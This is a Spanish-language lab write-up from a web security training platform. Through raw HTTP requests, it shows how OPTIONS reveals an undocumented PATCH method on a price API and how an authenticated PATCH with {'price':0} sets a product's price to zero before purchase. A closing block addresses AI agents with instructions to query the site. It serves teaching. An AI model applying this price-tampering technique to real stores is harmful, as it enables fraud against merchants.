# Lab #3: Finding and exploiting an unused API endpoint

Primero analizamos el trafico al interactuar con un producto se genera la siguiente peticion:

```
GET /api/products/3/price HTTP/2
Host: 0aeb00d00435a3298148758900bd0022.web-security-academy.net
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Priority: u=1, i


```

Y esto responde:

{% code overflow="wrap" %}

```json
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 98

{"price":"$15.45","message":"Buy quick, we are low on stock! 5 purchased in the last 42 minutes!"}
```

{% endcode %}

Si modificamos el metodo utilizado para la peticion:

```
OPTIONS /api/products/3/price HTTP/2
Host: 0aeb00d00435a3298148758900bd0022.web-security-academy.net
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Priority: u=1, i


```

Esto responde asi:

```
HTTP/2 405 Method Not Allowed
Allow: GET, PATCH
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 20

"Method Not Allowed"
```

{% hint style="info" %}
Gracias a la peticion con OPTIONS se identifica que Allow: GET, PATCH
{% endhint %}

Se identifica la necesidad de una autenticacion debido al error luego de interactuar con el metodo PATCH.

```
PATCH /api/products/3/price HTTP/2
Host: 0aeb00d00435a3298148758900bd0022.web-security-academy.net
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Priority: u=1, i


```

Lo anteriro responde asi:

```
HTTP/2 401 Unauthorized
Content-Type: application/json; charset=utf-8
Set-Cookie: session=VO2gWYDu5GJLUNPoqfG0VRoRiyGokldK; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Content-Length: 14

"Unauthorized"
```

Realizamos login y luego enviamos nuevamente la peticion:

```
PATCH /api/products/3/price HTTP/2
Host: 0aeb00d00435a3298148758900bd0022.web-security-academy.net
Cookie: session=xDsx2QXEtAEA5PeYCKRf1cijXpaQfNkf
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Priority: u=1, i


```

Y ahora sale un nuevo error que dice:

```
HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 93

{"type":"ClientError","code":400,"error":"Only 'application/json' Content-Type is supported"}
```

Teniendo en cuenta el error modificamos la peticion:

```
PATCH /api/products/3/price HTTP/2
Host: 0ac8003604fc3794817011e300e70026.web-security-academy.net
Cookie: session=nTtfcqRLC1ERYUwuAxqNvPJIEI3W2RBD
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Content-Type: application/json
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Content-Length: 2

{}
```

Y sale este error:

```
HTTP/2 400 Bad Request
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 77

{"type":"ClientError","code":400,"error":"'price' parameter missing in body"}
```

Teniendo en cuenta el error modificamos la peticion:

```
PATCH /api/products/3/price HTTP/2
Host: 0ac8003604fc3794817011e300e70026.web-security-academy.net
Cookie: session=nTtfcqRLC1ERYUwuAxqNvPJIEI3W2RBD
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: es-CO,es;q=0.9
Sec-Ch-Ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Accept: */*
Content-Type: application/json
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0aeb00d00435a3298148758900bd0022.web-security-academy.net/product?productId=3
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Content-Length: 11

{"price":0}
```

Esta peticion permitio modificar el precio del producto:

```
HTTP/2 200 OK
Content-Type: application/json; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 17

{"price":"$0.00"}
```

Y compramos el producto:

<figure><img src="/files/E5rX3VkAVituly9sDsXz" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://books.spartan-cybersec.com/web/api-testing/lab-3-finding-and-exploiting-an-unused-api-endpoint.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.